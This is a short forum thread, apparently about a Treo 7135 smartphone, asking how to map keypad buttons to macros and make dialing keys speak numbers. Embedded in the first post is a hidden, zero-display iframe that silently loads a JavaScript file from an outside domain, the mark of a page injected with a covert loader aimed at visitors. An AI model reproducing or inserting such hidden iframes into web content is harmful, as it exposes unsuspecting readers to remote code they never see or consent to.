    7135 keypad hack?

I know this was mentioned at one point in time, but does anyone know of a hack that would allow the keypad to be used as "smart buttons" as our good friend Rick Goetter likes to call them? <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

And what would these "smart buttons" do?

I suppose the hack would allow you to assign buttons to a recordable macro. For example, from the main palm screen a certain button could start my alarm app, select the alarm type, and then enable the alarm. Another example would be one that opened Eudora email and then automatically checked my mail.
The purpose is not having to take out the stylus because it's not the most convenient way sometimes.

I read on this board a while back that its possible to set the number keys to speak "1", "2", "3" etc when dialing. I also read that this slows down dialing.

How do you set your keypad to do this? I see the setting for "tones" or "clicks" but I don't see anything about "voice".
